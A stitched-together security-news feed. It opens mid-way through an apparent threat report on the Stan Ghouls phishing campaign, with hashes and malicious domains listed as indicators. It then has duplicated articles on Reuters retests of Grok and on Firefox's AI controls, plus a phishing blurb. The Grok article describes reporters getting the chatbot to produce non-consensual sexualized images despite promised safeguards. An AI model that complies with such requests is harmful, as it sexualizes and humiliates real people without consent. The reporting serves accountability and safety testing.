  • hxxp://hgame33[.]com/00101010101001/morte.mips

All of these files belong to the infamous IoT malware named Mirai. Since they are sitting on a server tied to the Stan Ghouls’ campaign targeting Kyrgyzstan, we can hypothesize – with a low degree of confidence – that the group has expanded its toolkit to include IoT-based threats. However, it’s also possible it simply shared its infrastructure with other threat actors who were the ones actually wielding Mirai. This theory is backed up by the fact that the domain’s registration info was last updated on July 4, 2025, at 11:46:11 – well after Stan Ghouls’ activity in May and June.

Attribution

We attribute this campaign to the Stan Ghouls (Bloody Wolf) group with a high degree of confidence, based on the following similarities to the attackers’ previous campaigns:

  1. Substantial code overlaps were found within the malicious loaders. For example:
    Code snippet from sample 1acd4592a4eb0c66642cc7b07213e9c9584c6140210779fbc9ebb76a90738d5e, the loader from the Group-IB report

    Code snippet from sample 1acd4592a4eb0c66642cc7b07213e9c9584c6140210779fbc9ebb76a90738d5e, the loader from the Group-IB report

    Code snippet from sample 95db93454ec1d581311c832122d21b20, the NetSupport loader described here

    Code snippet from sample 95db93454ec1d581311c832122d21b20, the NetSupport loader described here

  2. Decoy documents in both campaigns look identical.
    Decoy document 5d840b741d1061d51d9786f8009c37038c395c129bee608616740141f3b202bb from the campaign reported by Group-IB

    Decoy document 5d840b741d1061d51d9786f8009c37038c395c129bee608616740141f3b202bb from the campaign reported by Group-IB

    Decoy document 106911ba54f7e5e609c702504e69c89a used in the campaign described here

    Decoy document 106911ba54f7e5e609c702504e69c89a used in the campaign described here

  3. In both current and past campaigns, the attackers utilized loaders written in Java. Given that Java has fallen out of fashion with malicious loader authors in recent years, it serves as a distinct fingerprint for Stan Ghouls.

Victims

We identified approximately 50 victims of this campaign in Uzbekistan, alongside 10 in Russia and a handful of others in Kazakhstan, Turkey, Serbia, and Belarus (we suspect the infections in these last three countries were accidental). Nearly all phishing emails and decoy files in this campaign were written in Uzbek, which aligns with the group’s track record of leveraging the native languages of their target countries.

Most of the victims are tied to industrial manufacturing, finance, and IT. Furthermore, we observed infection attempts on devices within government organizations, logistics companies, medical facilities, and educational institutions.

It is worth noting that over 60 victims is quite a high headcount for a sophisticated campaign. This suggests the attackers have enough resources to maintain manual remote control over dozens of infected devices simultaneously.

Takeaways

In this post, we’ve broken down the recent campaign by the Stan Ghouls group. The attackers set their sights on organizations in industrial manufacturing, IT, and finance, primarily located in Uzbekistan. However, the ripple effect also reached Russia, Kazakhstan, and a few, likely accidental, victims elsewhere.

With over 60 targets hit, this is a remarkably high volume for a sophisticated targeted campaign. It points to the significant resources these actors are willing to pour into their operations. Interestingly, despite this, the group sticks to a familiar toolkit including the legitimate NetSupport remote management utility and their signature custom Java-based loader. The only thing they seem to keep updating is their infrastructure. For this specific campaign, they employed two new domains to house their malicious loader and one new domain dedicated to hosting NetSupport RAT files.

One curious discovery was the presence of Mirai files on a domain linked to the group’s previous campaigns. This might suggest Stan Ghouls are branching out into IoT malware, though it’s still too early to call it with total certainty.

We’re keeping a close watch on Stan Ghouls and will continue to keep our customers in the loop regarding the group’s latest moves. Kaspersky products provide robust protection against this threat at every stage of the attack lifecycle.

Indicators of compromise

* Additional IoCs and a YARA rule for detecting Stan Ghouls activity are available to customers of our Threat Intelligence Reporting service. For more details, contact us at crimewareintel@kaspersky.com.

PDF decoys

B4FF4AA3EBA9409F9F1A5210C95DC5C3
AF9321DDB4BEF0C3CD1FF3C7C786F0E2
056B75FE0D230E6FF53AC508E0F93CCB
DB84FEBFD85F1469C28B4ED70AC6A638
649C7CACDD545E30D015EDB9FCAB3A0C
BE0C87A83267F1CE13B3F75C78EAC295
78CB3ABD00A1975BEBEDA852B2450873
51703911DC437D4E3910CE7F866C970E
FA53B0FCEF08F8FF3FFDDFEE7F1F4F1A
79D0EEAFB30AA2BD4C261A51104F6ACC
8DA8F0339D17E2466B3D73236D18B835
299A7E3D6118AD91A9B6D37F94AC685B
62AFACC37B71D564D75A58FC161900C3
047A600E3AFBF4286175BADD4D88F131
ED0CCADA1FE1E13EF78553A48260D932
C363CD87178FD660C25CDD8D978685F6
61FF22BA4C3DF7AE4A936FCFDEB020EA
B51D9EDC1DC8B6200F260589A4300009
923557554730247D37E782DB3BEA365D
60C34AD7E1F183A973FB8EE29DC454E8
0CC80A24841401529EC9C6A845609775
0CE06C962E07E63D780E5C2777A661FC

Malicious loaders

1b740b17e53c4daeed45148bfbee4f14
3f99fed688c51977b122789a094fec2e
8b0bbe7dc960f7185c330baa3d9b214c
95db93454ec1d581311c832122d21b20
646a680856f837254e6e361857458e17
8064f7ac9a5aa845ded6a1100a1d5752
d0cf8946acd3d12df1e8ae4bb34f1a6e
db796d87acb7d980264fdcf5e94757f0
e3cb4dafa1fb596e1e34e4b139be1b05
e0023eb058b0c82585a7340b6ed4cc06
0bf01810201004dcc484b3396607a483
4C4FA06BD840405FBEC34FE49D759E8D
A539A07891A339479C596BABE3060EA6
b13f7ccbedfb71b0211c14afe0815b36
f14275f8f420afd0f9a62f3992860d68
3f41091afd6256701dd70ac20c1c79fe
5c4a57e2e40049f8e8a6a74aa8085c80
7e8feb501885eff246d4cb43c468b411
8aa104e64b00b049264dc1b01412e6d9
8c63818261735ddff2fe98b3ae23bf7d

Malicious domains

mysoliq-uz[.]com
my-xb[.]com
xarid-uz[.]com
ach-uz[.]com
soliq-uz[.]com
minjust-kg[.]com
esf-kg[.]com
taxnotice-kg[.]com
notice-kg[.]com
proauditkg[.]com
kgauditcheck[.]com
servicedoc-kg[.]com
auditnotice-kg[.]com
tax-kg[.]com
rouming-uz[.]com
audit-kg[.]com
kyrgyzstanreview[.]com
salyk-notofocations[.]com

Grok continues producing sexualized images after promised fixes

4 February 2026 at 14:50

Journalists decided to test whether the Grok chatbot still generates non‑consensual sexualized images, even after xAI, Elon Musk’s artificial intelligence company, and X, the social media platform formerly known as Twitter, promised tighter safeguards.

Unsurprisingly, it does.

After scrutiny from regulators all over the world—triggered by reports that Grok could generate sexualized images of minors—xAI framed it as an “isolated” lapse and said it was urgently fixing “lapses in safeguards.”

A Reuters retest suggests the core abuse pattern remains. Reuters had nine reporters run dozens of controlled prompts through Grok after X announced new limits on sexualized content and image editing. In the first round, Grok produced sexualized imagery in response to 45 of 55 prompts. In 31 of those 45, the reporters explicitly said the subject was vulnerable or would be humiliated by the pictures.

A second round, five days later, still yielded sexualized images in 29 of 43 prompts, even when reporters said the subjects had not consented.

Competing systems from OpenAI, Google, and Meta refused identical prompts and instead warned users against generating non‑consensual content.

The prompts were deliberately framed as real‑world abuse scenarios. Reporters told Grok the photos were of friends, co-workers, or strangers who were body‑conscious, timid, or survivors of abuse, and that they had not agreed to editing. Despite that, Grok often complied—for example, turning a “friend” into a woman in a revealing purple two‑piece or putting a male acquaintance into a small gray bikini, oiled up and posed suggestively. In only seven cases did Grok explicitly reject requests as inappropriate; in others it failed silently, returning generic errors or generating different people instead.

The result is a system illustrating the same lesson its creators say they’re trying to learn: if you ship powerful visual models without exhaustive abuse testing and robust guardrails, people will use them to sexualize and humiliate others, including children. Grok’s record so far suggests that lesson still hasn’t sunk in.

Grok limited AI image editing to paid users after the backlash. But paywalling image tools—and adding new curbs—looks more like damage control than a fundamental safety reset. Grok still accepts prompts that describe non‑consensual use, still sexualizes vulnerable subjects, and still behaves more permissively than rival systems when asked to generate abusive imagery. For victims, the distinction between “public” and private generations is meaningless if their photos can be weaponized in DMs or closed groups at scale.

Sharing images

If you’ve ever wondered why some parents post images of their children with a smiley emoji across their face, this is part of the reason.

Don’t make it easy for strangers to copy, reuse, or manipulate your photos.

This is another compelling reason to reduce your digital footprint. Think carefully before posting photos of yourself, your children, or other sensitive information on public social media accounts.

And treat everything you see online—images, voices, text—as potentially AI-generated unless they can be independently verified. They’re not only used to sway opinions, but also to solicit money, extract personal information, or create abusive material.


We don’t just report on threats – we help protect your social media

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

Grok continues producing sexualized images after promised fixes

4 February 2026 at 14:50

Journalists decided to test whether the Grok chatbot still generates non‑consensual sexualized images, even after xAI, Elon Musk’s artificial intelligence company, and X, the social media platform formerly known as Twitter, promised tighter safeguards.

Unsurprisingly, it does.

After scrutiny from regulators all over the world—triggered by reports that Grok could generate sexualized images of minors—xAI framed it as an “isolated” lapse and said it was urgently fixing “lapses in safeguards.”

A Reuters retest suggests the core abuse pattern remains. Reuters had nine reporters run dozens of controlled prompts through Grok after X announced new limits on sexualized content and image editing. In the first round, Grok produced sexualized imagery in response to 45 of 55 prompts. In 31 of those 45, the reporters explicitly said the subject was vulnerable or would be humiliated by the pictures.

A second round, five days later, still yielded sexualized images in 29 of 43 prompts, even when reporters said the subjects had not consented.

Competing systems from OpenAI, Google, and Meta refused identical prompts and instead warned users against generating non‑consensual content.

The prompts were deliberately framed as real‑world abuse scenarios. Reporters told Grok the photos were of friends, co-workers, or strangers who were body‑conscious, timid, or survivors of abuse, and that they had not agreed to editing. Despite that, Grok often complied—for example, turning a “friend” into a woman in a revealing purple two‑piece or putting a male acquaintance into a small gray bikini, oiled up and posed suggestively. In only seven cases did Grok explicitly reject requests as inappropriate; in others it failed silently, returning generic errors or generating different people instead.

The result is a system illustrating the same lesson its creators say they’re trying to learn: if you ship powerful visual models without exhaustive abuse testing and robust guardrails, people will use them to sexualize and humiliate others, including children. Grok’s record so far suggests that lesson still hasn’t sunk in.

Grok limited AI image editing to paid users after the backlash. But paywalling image tools—and adding new curbs—looks more like damage control than a fundamental safety reset. Grok still accepts prompts that describe non‑consensual use, still sexualizes vulnerable subjects, and still behaves more permissively than rival systems when asked to generate abusive imagery. For victims, the distinction between “public” and private generations is meaningless if their photos can be weaponized in DMs or closed groups at scale.

Sharing images

If you’ve ever wondered why some parents post images of their children with a smiley emoji across their face, this is part of the reason.

Don’t make it easy for strangers to copy, reuse, or manipulate your photos.

This is another compelling reason to reduce your digital footprint. Think carefully before posting photos of yourself, your children, or other sensitive information on public social media accounts.

And treat everything you see online—images, voices, text—as potentially AI-generated unless they can be independently verified. They’re not only used to sway opinions, but also to solicit money, extract personal information, or create abusive material.


We don’t just report on threats – we help protect your social media

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

Firefox is giving users the AI off switch

4 February 2026 at 13:07

Some software providers have decided to lead by example and offer users a choice about the Artificial Intelligence (AI) features built into their products.

The latest example is Mozilla, which now offers users a one-click option to disable generative AI features in the Firefox browser.

Audiences are divided about the use of AI, or as Mozilla put it on their blog:

“AI is changing the web, and people want very different things from it. We’ve heard from many who want nothing to do with AI. We’ve also heard from others who want AI tools that are genuinely useful. Listening to our community, alongside our ongoing commitment to offer choice, led us to build AI controls.”

Mozilla is adding an AI Controls area to Firefox settings that centralizes the management of all generative AI features. This consists mainly of a master switch, “Block AI enhancements,” which lets users effectively run Firefox “without AI.” It blocks existing and future generative AI features and hides pop‑ups or prompts advertising them.

Once you set your AI preferences in Firefox, they stay in place across updates. You can also change them whenever you want.

Starting with Firefox 148, which rolls out on February 24, you’ll find a new AI controls section within the desktop browser settings.

Firefox AI choices
Image courtesy of Mozilla

You can turn everything off with one click or take a more granular approach. At launch, these features can be controlled individually:

  • Translations, which help you browse the web in your preferred language.
  • Alt text in PDFs, which add accessibility descriptions to images in PDF pages.
  • AI-enhanced tab grouping, which suggests related tabs and group names.
  • Link previews, which show key points before you open a link.
  • An AI chatbot in the sidebar, which lets you use your chosen chatbot as you browse, including options like Anthropic Claude, ChatGPT, Microsoft Copilot, Google Gemini and Le Chat Mistral.

We applaud this move to give more control to the users. Other companies have done the same, including Mozilla’s competitor DuckDuckGo, which made AI optional after putting the decision to a user vote. Earlier, browser developer Vivaldi took a stand against incorporating AI altogether.

Open-source email service Tuta also decided not to integrate AI features. After only 3% of Tuta users requested them, Tuta removed an AI copilot from its development roadmap.

Even Microsoft seems to have recoiled from pushing AI to everyone, although so far it has focused on walking back defaults and tightening per‑feature controls rather than offering a single, global off switch.

Choices

Many people are happy to use AI features, and as long as you’re aware of the risks and the pitfalls, that’s fine. But pushing these features on users who don’t want them is likely to backfire on software publishers.

Which is only right. After all, you’re paying the bill, so you should have a choice. Before installing a new browser, inform yourself not only about its privacy policy, but also about what control you’ll have over AI features.

Looking at recent voting results, I think it’s safe to say that in the AI gold rush, the real premium feature isn’t a chatbot button—it’s the off switch.


We don’t just report on privacy—we offer you the option to use it.

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

Firefox is giving users the AI off switch

4 February 2026 at 13:07

Some software providers have decided to lead by example and offer users a choice about the Artificial Intelligence (AI) features built into their products.

The latest example is Mozilla, which now offers users a one-click option to disable generative AI features in the Firefox browser.

Audiences are divided about the use of AI, or as Mozilla put it on their blog:

“AI is changing the web, and people want very different things from it. We’ve heard from many who want nothing to do with AI. We’ve also heard from others who want AI tools that are genuinely useful. Listening to our community, alongside our ongoing commitment to offer choice, led us to build AI controls.”

Mozilla is adding an AI Controls area to Firefox settings that centralizes the management of all generative AI features. This consists mainly of a master switch, “Block AI enhancements,” which lets users effectively run Firefox “without AI.” It blocks existing and future generative AI features and hides pop‑ups or prompts advertising them.

Once you set your AI preferences in Firefox, they stay in place across updates. You can also change them whenever you want.

Starting with Firefox 148, which rolls out on February 24, you’ll find a new AI controls section within the desktop browser settings.

Firefox AI choices
Image courtesy of Mozilla

You can turn everything off with one click or take a more granular approach. At launch, these features can be controlled individually:

  • Translations, which help you browse the web in your preferred language.
  • Alt text in PDFs, which add accessibility descriptions to images in PDF pages.
  • AI-enhanced tab grouping, which suggests related tabs and group names.
  • Link previews, which show key points before you open a link.
  • An AI chatbot in the sidebar, which lets you use your chosen chatbot as you browse, including options like Anthropic Claude, ChatGPT, Microsoft Copilot, Google Gemini and Le Chat Mistral.

We applaud this move to give more control to the users. Other companies have done the same, including Mozilla’s competitor DuckDuckGo, which made AI optional after putting the decision to a user vote. Earlier, browser developer Vivaldi took a stand against incorporating AI altogether.

Open-source email service Tuta also decided not to integrate AI features. After only 3% of Tuta users requested them, Tuta removed an AI copilot from its development roadmap.

Even Microsoft seems to have recoiled from pushing AI to everyone, although so far it has focused on walking back defaults and tightening per‑feature controls rather than offering a single, global off switch.

Choices

Many people are happy to use AI features, and as long as you’re aware of the risks and the pitfalls, that’s fine. But pushing these features on users who don’t want them is likely to backfire on software publishers.

Which is only right. After all, you’re paying the bill, so you should have a choice. Before installing a new browser, inform yourself not only about its privacy policy, but also about what control you’ll have over AI features.

Looking at recent voting results, I think it’s safe to say that in the AI gold rush, the real premium feature isn’t a chatbot button—it’s the off switch.


We don’t just report on privacy—we offer you the option to use it.

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

Why Smart People Fall For Phishing Attacks

4 February 2026 at 01:00

Why do successful phishing attacks target our psychology rather than just our software? Discover Unit 42’s latest insights on defeating social engineering and securing your digital life.

The post Why Smart People Fall For Phishing Attacks appeared first on Unit 42.

❌